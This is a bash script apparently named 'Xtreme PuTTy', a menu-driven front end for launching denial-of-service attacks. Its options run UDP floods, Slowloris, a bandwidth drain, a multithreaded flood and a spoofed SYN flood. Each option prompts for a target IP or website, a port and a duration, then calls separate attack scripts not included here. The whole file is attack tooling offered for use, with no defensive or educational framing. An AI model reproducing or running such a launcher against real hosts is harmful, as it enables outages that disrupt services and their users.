#!/bin/bash
BLACK='\e[0;30m'
BLUE='\e[0;34m'
GREEN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
PURPLE='\e[0;35m'
BROWN='\e[0;33m'
LIGHTGRAY='\e[0;37m'
DARKGRAY='\e[1;30m'
LIGHTBLUE='\e[1;34m'
LIGHTGREEN='\e[1;32m'
LIGHTCYAN='\e[1;36m'
LIGHTRED='\e[1;31m'
LIGHTPURPLE='\e[1;35m'
YELLOW='\e[1;33m'
WHITE='\e[1;37m'
NC='\e[0m'              # No Color
# Trap Signal Script
#
exit_script()
{
  echo "* * *Trap * * *"
  ./menu
}

udp_flooda()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                              UDP FLOOD                            ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
./gott.1.pl $ip $port 0 $time
}

udp_floodb()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                              UDP FLOOD                            ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter the time :"
read time
python gott.2.py $ip $port $time
}

slap()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                            GoTT FLOOD                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
perl gott.3.pl $ip
}

slowloris()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                        Slowloris IN C                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "To stop this script after execution hold [CTRL] + [C]"
echo "Enter website address :"
read host
echo "Enter a port :"
read port
./slowloris $host $port
}

killall()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
pkill gott.1.pl
pkill gott.2.py
pkill gott.2.pl
pkill gott.4.pl
pkill slowloris
}

fry()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦             SUPER AMAZING UDP FLOOD STOP WITH CTRL-C              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter IP Address :"
read ip
echo "Enter Port :"
read port
echo "Enter the time in seconds :"
read time
echo "Enter the thread count :"
read threads
perl gott.4.pl $ip $port 65500 $time $threads 1
}

bw()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                    Bandwidth Drain coded in C                     ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
./gott -i $ip -p $port -s 32000 -t $time
}

syn()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                    Spoofed SyN Flood coded in C                   ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
./syn $ip $port
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [1] ${RED} UDP Flood     ¦ ${LIGHTBLUE}   [2] ${RED}UDP Flood B   ¦ ${LIGHTBLUE}  [3] ${RED}Xtreme FlooD${BLUE}¦¦¦"
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [4] ${RED} SLOWLORIS     ¦ ${LIGHTBLUE}   [5] ${RED}Multithread Flood¦${LIGHTBLUE}[6] ${RED}Bandwidth  ${BLUE} ¦¦¦" 	
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [7] ${RED} SyN Flood     ¦${LIGHTBLUE}    [8] ${RED}Kill Attacks ¦${LIGHTBLUE} [9] ${RED}Change Password${BLUE}¦¦¦"
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -n " Enter your menu choice [1-11]: "
    read yourch
    case $yourch in
      1) udp_flooda ;;
      2) udp_floodb ;;
      3) slap ;;
	  4) slowloris ;;
	  5) fry ;;
         6) bw ;;
         7) syn ;;
	  8) killall ;;
	  9) passwd ;;
      ex) echo "As you Command" ;  exit 1  ;;
	  end) pkill menu  ;;
      *) echo "Invalid Selection, Please make another selection" ;
         echo "Press a key. . ." ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_input1
#
Take_input1